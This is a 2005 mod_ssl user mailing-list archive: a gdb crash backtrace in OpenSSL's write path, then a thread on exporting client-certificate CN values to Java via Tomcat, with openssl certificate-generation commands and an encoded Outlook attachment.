#24 0x080a3b57 in make_child (s=0x0, slot=0, now=0) at http_main.c:5051
#25 0x080a3cad in startup_children (number_to_start=1) at http_main.c:5078
#26 0x080a48db in standalone_main (argc=2, argv=0xbfffe9b4) at
http_main.c:5410
#27 0x080a4c70 in main (argc=2, argv=0xbfffe9b4) at http_main.c:5767
#28 0x420158f7 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) 


(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x400d6950 in ssl3_write_pending (s=0x8173970, type=0, buf=0x0, len=8192)
    at s3_pkt.c:705
705     s3_pkt.c: No such file or directory.
        in s3_pkt.c
(gdb) bt
#0  0x400d6950 in ssl3_write_pending (s=0x8173970, type=0, buf=0x0,
len=8192)
    at s3_pkt.c:705
#1  0x400d65be in ssl3_write_bytes (s=0x8173970, type=23, buf_=0xbfffc670, 
    len=0) at s3_pkt.c:541
#2  0x400d4744 in ssl3_write (s=0x2000, buf=0x0, len=8192) at s3_lib.c:1299
#3  0x400dcaac in SSL_write (s=0x201d, buf=0x201d, num=8221) at
ssl_lib.c:756
#4  0x08081032 in ssl_io_hook_write (fb=0x2000, 
    buf=0xbfffc670 "m"..., len=8192)
    at ssl_engine_io.c:384
#5  0x080b983f in ap_hook_call_func (ap=0x0, he=0x80ed888, hf=0x106b)
    at ap_hook.c:721
#6  0x080b9460 in ap_hook_call (hook=0x0) at ap_hook.c:382
#7  0x08094b74 in ap_write (fb=0x80ed888, buf=0x0, nbyte=8192) at buff.c:318
#8  0x08095914 in write_with_errors (fb=0x80ed888, buf=0xbfffc670, nbyte=0)
    at buff.c:365
#9  0x080959c7 in bcwrite (fb=0x8107e68, buf=0xbfffc670, nbyte=8192)
    at buff.c:1170
#10 0x08095d2b in ap_bwrite (fb=0x8107e68, buf=0xbfffc670, nbyte=8192)
    at buff.c:1384
#11 0x080a8e11 in ap_send_fd_length (f=0x81f57a0, r=0x81c6b78,
length=85684453)
    at http_protocol.c:2386
#12 0x0809e7fa in default_handler (r=0x2000) at http_core.c:4196
#13 0x08096ba9 in ap_invoke_handler (r=0x81c6b78) at http_config.c:487
#14 0x080abbd4 in process_request_internal (r=0x81c6b78) at
http_request.c:1298
#15 0x080abe2b in ap_process_request (r=0x81c6b78) at http_request.c:1314
#16 0x080a395e in child_main (child_num_arg=0) at http_main.c:4872
#17 0x080a3b57 in make_child (s=0x0, slot=0, now=0) at http_main.c:5051
#18 0x080a3cad in startup_children (number_to_start=1) at http_main.c:5078
#19 0x080a48db in standalone_main (argc=2, argv=0xbfffe9b4) at
http_main.c:5410
#20 0x080a4c70 in main (argc=2, argv=0xbfffe9b4) at http_main.c:5767
#21 0x420158f7 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 22 18:18:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C965014D99F; Mon, 22 Aug 2005 18:18:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web34101.mail.mud.yahoo.com (web34101.mail.mud.yahoo.com [66.163.178.99])
	by master.modssl.org (Postfix) with SMTP id 1408F14D977
	for ; Mon, 22 Aug 2005 18:18:00 +0200 (CEST)
Received: (qmail 83290 invoked by uid 60001); 22 Aug 2005 16:17:59 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=YhzMe1Gc9LOD+Ght7a2kkuk8C5+qk9CmFqxCG6y2g8rT2k7EzpOIoYl4ZqZ0whFufwIyT2oAhzaBs3c1Gw9BzX7oHo8tHqlhDw6mRSTtLtRe+0WyGGwYuOQM7iA2xIc4SqpYjboS6Es+8g6XQRaG2qDJcROTL31qu3Yv0YDFDvU=  ;
Message-ID: <20050822161759.83287.qmail@web34101.mail.mud.yahoo.com>
Received: from [147.160.136.10] by web34101.mail.mud.yahoo.com via HTTP; Mon, 22 Aug 2005 09:17:59 PDT
Date: Mon, 22 Aug 2005 09:17:59 -0700 (PDT)
From: August West 
Subject: export client certificate CN?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: August West 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am currently using mod_ssl to verify client certs.
are issued by trusted CAs (e.g. SSLVerifyClient
require), but then using username/password for
application identification/authorization, passing this
to Oracle via Tomcat using JAVA.  However, I'd like to
be able to use client certs. for I/A by exporting the
CN (or perhaps serial number) when verifying.  I have
tried to add "SSLOptions +ExportCertData", but I am
not sure where this data is being exported too!  This
seemed like the appropriate SSL Option to be able to
parse the cert data, but please correct me if I am
wrong.  Does anyone have any implementation
suggestions exporting the CN from client certs,
particularly for retrieving this information with
JAVA?
TIA!

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 22 19:46:27 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 53A8F14D99F; Mon, 22 Aug 2005 19:46:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from scylla.cts.cwu.edu (scylla.cts.cwu.edu [198.104.67.51])
	by master.modssl.org (Postfix) with ESMTP id B3FE714D977
	for ; Mon, 22 Aug 2005 19:46:23 +0200 (CEST)
Received: from CONVERSION-CWU-DAEMON.SCYLLA.CTS.CWU.EDU by SCYLLA.CTS.CWU.EDU
 (PMDF V6.2-1x9 #31005) id <01LS4JRVHWCG000KO8@SCYLLA.CTS.CWU.EDU> for
 modssl-users@modssl.org; Mon, 22 Aug 2005 10:46:19 -0700 (PDT)
Received: from hermes.cwu.edu (klonas-smtp-vip.cts.cwu.edu [192.168.65.171])
 by SCYLLA.CTS.CWU.EDU (PMDF V6.2-1x9 #31005)
 with ESMTP id <01LS4JRV7ZE8000IY5@SCYLLA.CTS.CWU.EDU> for
 modssl-users@modssl.org; Mon, 22 Aug 2005 10:46:19 -0700 (PDT)
Received: from CWUGate1-MTA by hermes.cwu.edu	with Novell_GroupWise; Mon,
 22 Aug 2005 10:46:30 -0700
Date: Mon, 22 Aug 2005 10:46:04 -0700
From: Andrew Musselman 
Subject: Re: export client certificate CN?
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: Novell GroupWise Internet Agent 6.5.2
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
Content-disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Musselman 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to use mod_auth_ldap with apache2, and I am having trouble
figuring out how to generate a trusted Certificate Authority
certificate.  I tried using the Netscape certificate database file as
the apache docs suggest, but I'm still getting a complaint from LDAP
that "LDAP: ssl connections not supported".

Can I use openssl to make a DER_FILE or a BASE64_FILE?  Has anyone here
had experience getting this to work?

Thanks for your time.

Best,
Andrew

I am totally lost on this.  I appreciate any help 
>>> junglist2000@YAHOO.com 8/22/2005 9:17 AM >>>
I am currently using mod_ssl to verify client certs.
are issued by trusted CAs (e.g. SSLVerifyClient
require), but then using username/password for
application identification/authorization, passing this
to Oracle via Tomcat using JAVA.  However, I'd like to
be able to use client certs. for I/A by exporting the
CN (or perhaps serial number) when verifying.  I have
tried to add "SSLOptions +ExportCertData", but I am
not sure where this data is being exported too!  This
seemed like the appropriate SSL Option to be able to
parse the cert data, but please correct me if I am
wrong.  Does anyone have any implementation
suggestions exporting the CN from client certs,
particularly for retrieving this information with
JAVA?
TIA!

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org

Andrew Musselman
andrew@cwu.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 22 20:20:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6F0714D9A8; Mon, 22 Aug 2005 20:20:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pm.ctcgsc.org (pm.ctcgsc.org [147.160.99.55])
	by master.modssl.org (Postfix) with ESMTP id 760F114D98E
	for ; Mon, 22 Aug 2005 20:20:33 +0200 (CEST)
Received: from server3.ctc.com (server3.ctc.com [147.160.1.6])
	by pm.ctcgsc.org (Switch-3.1.7/Switch-3.1.0) with ESMTP id j7MIKWZY005307
	for ; Mon, 22 Aug 2005 14:20:32 -0400
Received: from ctcjst-mail1.ad.ctcgsc.org (ctcjst-mail1.ad.ctcgsc.org [147.160.13.13])
	by server3.ctc.com (Switch-3.0.5/Switch-3.0.0) with ESMTP id j7MIKVcT021235
	for ; Mon, 22 Aug 2005 14:20:32 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: export client certificate CN?
Date: Mon, 22 Aug 2005 14:20:31 -0400
Message-ID: <58BD7BA1E81ED54E88F2266E149D93D606E9112C@ctcjst-mail1.ad.ctcgsc.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: export client certificate CN?
Thread-Index: AcWnQXF7hHIFkn+kQdCzWbu3XG3aswAAjQBQ
From: "Gaydosh, Adam" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gaydosh, Adam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>I am trying to use mod_auth_ldap with apache2, and I am having=20
>trouble figuring out how to generate a trusted Certificate=20
>Authority certificate.  I tried using the Netscape certificate=20
>database file as the apache docs suggest, but I'm still=20
>getting a complaint from LDAP that "LDAP: ssl connections not=20
>supported".

Not sure but this sounds like you haven't enabled SSL, not that it cant
negotiate the session.=20

>Can I use openssl to make a DER_FILE or a BASE64_FILE?  Has=20
>anyone here had experience getting this to work?

Here's how I've generated server cert requests (PKCS #10 which works
fine with Netscape):
openssl req -config openssl.cnf -new -out hostname.csr
openssl rsa -in privkey.pem -out hostname.key

Then you'll need to tell point apache to the right certs:
SSLCertificateFile /server.crt
SSLCertificateKeyFile /server.key
SLCACertificateFile /CA.crt

If you want to generate the certs yourself rather then submit the CSRs
to a CA:
openssl x509 -in hostname.csr -out hostname.crt -req -signkey
hostname.key -days 365
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 23 15:57:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6238D14D994; Tue, 23 Aug 2005 15:57:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan5.bah.com (mclean-vscan5.bah.com [156.80.3.66])
	by master.modssl.org (Postfix) with ESMTP id E4C2614D974
	for ; Tue, 23 Aug 2005 15:57:26 +0200 (CEST)
Received: from mclean-vscan5.bah.com (mclean-vscan5.bah.com [156.80.3.66])
	by mclean-vscan5.bah.com (8.11.0/8.11.0) with SMTP id j7NDvJg08700
	for ; Tue, 23 Aug 2005 09:57:19 -0400 (EDT)
Received: from mclnexbh03.resource.ds.bah.com ([156.80.7.153])
 by mclean-vscan5.bah.com (SAVSMTP 3.1.7.47) with SMTP id M2005082309571916187
 for ; Tue, 23 Aug 2005 09:57:19 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.141]) by mclnexbh03.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Tue, 23 Aug 2005 09:57:19 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C5A7EA.93BCB2EF"
Subject: RE: export client certificate CN?
Date: Tue, 23 Aug 2005 09:56:50 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: export client certificate CN?
Thread-Index: AcWnPNEGyYwUTRy7Qb2xbXrMebtkMwArbGax
References: <20050822161759.83287.qmail@web34101.mail.mud.yahoo.com>
From: "Hoda Nadeem" 
To: 
X-OriginalArrivalTime: 23 Aug 2005 13:57:19.0607 (UTC) FILETIME=[93EFA870:01C5A7EA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5A7EA.93BCB2EF
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Add the following line to you httpd configuration:=20

JkEnvVar SSL_CLIENT_S_DN none

JkEnvVar SSL_CLIENT_CERT none

This will make the client cert and distinguished name available through =
Apache enviroment variables.

Then in Java (within a JSP/servlet):

String DN =3D (String) request.getAttribute("SSL_CLIENT_S_DN"); // can =
also get the whole cert: SSL_CLIENT_CERT

And parse out the common name.

Nadeem


________________________________

From: owner-modssl-users@modssl.org on behalf of August West
Sent: Mon 8/22/2005 12:17 PM
To: modssl-users@modssl.org
Subject: export client certificate CN?



I am currently using mod_ssl to verify client certs.
are issued by trusted CAs (e.g. SSLVerifyClient
require), but then using username/password for
application identification/authorization, passing this
to Oracle via Tomcat using JAVA.  However, I'd like to
be able to use client certs. for I/A by exporting the
CN (or perhaps serial number) when verifying.  I have
tried to add "SSLOptions +ExportCertData", but I am
not sure where this data is being exported too!  This
seemed like the appropriate SSL Option to be able to
parse the cert data, but please correct me if I am
wrong.  Does anyone have any implementation
suggestions exporting the CN from client certs,
particularly for retrieving this information with
JAVA?
TIA!

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



------_=_NextPart_001_01C5A7EA.93BCB2EF
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IhQNAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAIgAAAFJFOiBleHBvcnQgY2xpZW50
IGNlcnRpZmljYXRlIENOPwDFCwEFgAMADgAAANUHCAAXAAkAOAAyAAIAcAEBIIADAA4AAADVBwgA
FwAJADkAEwACAFIBAQmAAQAhAAAAMzRCMTY4QzY4NDUyOTk0RTk1NEExMTIzMTFCRjZGNTkA/QYB
A5AGADATAAA4AAAAAwA2AAAAAABAADkAZ4KeguqnxQEeAD0AAQAAAAUAAABSRTogAAAAAAIBRwAB
AAAAPAAAAGM9VVM7YT0gO3A9Qm9veiBBbGxlbiBIYW1pbDtsPU1DTE5FWFZTMDctMDUwODIzMTM1
NzE5Wi0xOTc5AB4ASQABAAAAHgAAAGV4cG9ydCBjbGllbnQgY2VydGlmaWNhdGUgQ04/AAAAQABO
AIAVyw81p8UBHgBaAAEAAAAeAAAAb3duZXItbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAAAACAVsA
AQAAAFkAAAAAAAAAgSsfpL6jEBmdbgDdAQ9UAgAAAABvd25lci1tb2Rzc2wtdXNlcnNAbW9kc3Ns
Lm9yZwBTTVRQAG93bmVyLW1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnAAAAAAIBXAABAAAAIwAAAFNN
VFA6T1dORVItTU9EU1NMLVVTRVJTQE1PRFNTTC5PUkcAAB4AXQABAAAADAAAAEF1Z3VzdCBXZXN0
AAIBXgABAAAAQAAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAAAAEF1Z3VzdCBXZXN0AFNNVFAAanVu
Z2xpc3QyMDAwQHlhaG9vLmNvbQACAV8AAQAAABwAAABTTVRQOkpVTkdMSVNUMjAwMEBZQUhPTy5D
T00AHgBmAAEAAAAFAAAAU01UUAAAAAAeAGcAAQAAAB4AAABvd25lci1tb2Rzc2wtdXNlcnNAbW9k
c3NsLm9yZwAAAB4AaAABAAAABQAAAFNNVFAAAAAAHgBpAAEAAAAXAAAAanVuZ2xpc3QyMDAwQHlh
aG9vLmNvbQAAHgBwAAEAAAAeAAAAZXhwb3J0IGNsaWVudCBjZXJ0aWZpY2F0ZSBDTj8AAAACAXEA
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
TyJfI28kfyWP3yafJ6/173rULPAuTBFMUbouYWBn7+/w/9mMVVsxfZYAdV+AhDHTg2Jf9CZM/1KQ
VTwpjye/M8803zXvNv//OA85HzovOz88Tz1fPm8/f/9Aj0GfQq9Dv0TPRd9G70f//0kPSh9LL0w/
TU9OX09vUH//UY9Sn1OvVL9Vz1bfV+9Y//9aD1sfXC9dP15PX19gb2F//2KPY59kr2W/Zs9n32jv
af+faw9sHyuP9uQtNC11eOH8c0AtPy5PL1/ydoUgrcC/ldGTUDNycB/289OQbvQA/5tAbT9uT2x/
eO95/3sPfB//fS9+P39PgF+Bb4J/g4+En/+Fr4a/h8+I34nviv+MD40f/44vjz+QT5Ffkm+Tf5SP
lZ//lq+Xv5jPmd+a75v/nQ+eH/+fL6A/oU+iX6NvpH+lj6af/6evqL+pz6rfq++s/64Prx//sC+x
P7JPs1+0b7V/to+3n/+4r7m/us+737zvvf+/D8AfT8Evwj9wD3EVYWoxYGR95JBvcj9zT3Rfwt/J
YzXBycEvRk9OVMoZ5U9/5lDbkuaIyxj208sf86Y3FegSUOhuMNtBL0RJ9lbNT9FvZ+XR9vPVz9bf
hDU46CFCT0RZ6G0X6BDYD9qRN+ghSFRNCkzKEH3cwAAeADUQAQAAAEgAAAA8RUU3ODBFNDU3QkMy
MzM0NEI2MTQzOEZFMzYwOEYxNkU3NzI4MzZATUNMTkVYVlMwNy5yZXNvdXJjZS5kcy5iYWguY29t
PgAeADkQAQAAADkAAAA8MjAwNTA4MjIxNjE3NTkuODMyODcucW1haWxAd2ViMzQxMDEubWFpbC5t
dWQueWFob28uY29tPgAAAAAeAEcQAQAAAA8AAABtZXNzYWdlL3JmYzgyMgAACwDyEAEAAAAfAPMQ
AQAAAFQAAABSAEUAJQAzAEEAIABlAHgAcABvAHIAdAAgAGMAbABpAGUAbgB0ACAAYwBlAHIAdABp
AGYAaQBjAGEAdABlACAAQwBOACUAMwBGAC4ARQBNAEwAAAALAPYQAAAAAEAABzALIJyC6qfFAUAA
CDAXAcuT6qfFAQMA3j+vbwAAAwDxPwkEAAAeAPg/AQAAAAwAAABIb2RhIE5hZGVlbQACAfk/AQAA
AGkAAAAAAAAA3KdAyMBCEBq0uQgAKy/hggEAAAAAAAAAL089Qk9PWiBBTExFTiBIQU1JTFRPTi9P
VT1GSVJTVCBBRE1JTklTVFJBVElWRSBHUk9VUC9DTj1SRUNJUElFTlRTL0NOPTUxNTk1NQAAAAAe
APo/AQAAABUAAABTeXN0ZW0gQWRtaW5pc3RyYXRvcgAAAAACAfs/AQAAAB4AAAAAAAAA3KdAyMBC
EBq0uQgAKy/hggEAAAAAAAAALgAAAAMA/T/kBAAAAwAZQAAAAAADABpAAAAAAAMAHUAAAAAAAwAe
QAAAAAAeADBAAQAAAAcAAAA1MTU5NTUAAB4AMUABAAAABwAAADUxNTk1NQAAHgAyQAEAAAAeAAAA
b3duZXItbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAAAAeADNAAQAAABcAAABqdW5nbGlzdDIwMDBA
eWFob28uY29tAAAeADhAAQAAAAcAAAA1MTU5NTUAAB4AOUABAAAAAgAAAC4AAAADAHZA/////wsA
KQAAAAAACwAjAAAAAAADAAYQQHv2PQMABxD4BAAAAwAQEAAAAAADABEQAAAAAB4ACBABAAAAZQAA
AEFERFRIRUZPTExPV0lOR0xJTkVUT1lPVUhUVFBEQ09ORklHVVJBVElPTjpKS0VOVlZBUlNTTENM
SUVOVFNETk5PTkVKS0VOVlZBUlNTTENMSUVOVENFUlROT05FVEhJU1dJTEwAAAAAAgF/AAEAAABI
AAAAPEVFNzgwRTQ1N0JDMjMzNDRCNjE0MzhGRTM2MDhGMTZFNzcyODM2QE1DTE5FWFZTMDcucmVz
b3VyY2UuZHMuYmFoLmNvbT4Amuk=

------_=_NextPart_001_01C5A7EA.93BCB2EF--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 25 10:41:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DC4AD14D9BB; Thu, 25 Aug 2005 10:41:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cappuccino.hostingprojekt.net (cappuccino.hostingprojekt.net [81.169.183.25])
	by master.modssl.org (Postfix) with SMTP id 8F0F514D980
	for ; Thu, 25 Aug 2005 10:41:54 +0200 (CEST)
Received: (qmail 30200 invoked from network); 25 Aug 2005 08:41:53 -0000
Received: from unknown (HELO localhost) (127.0.0.1)
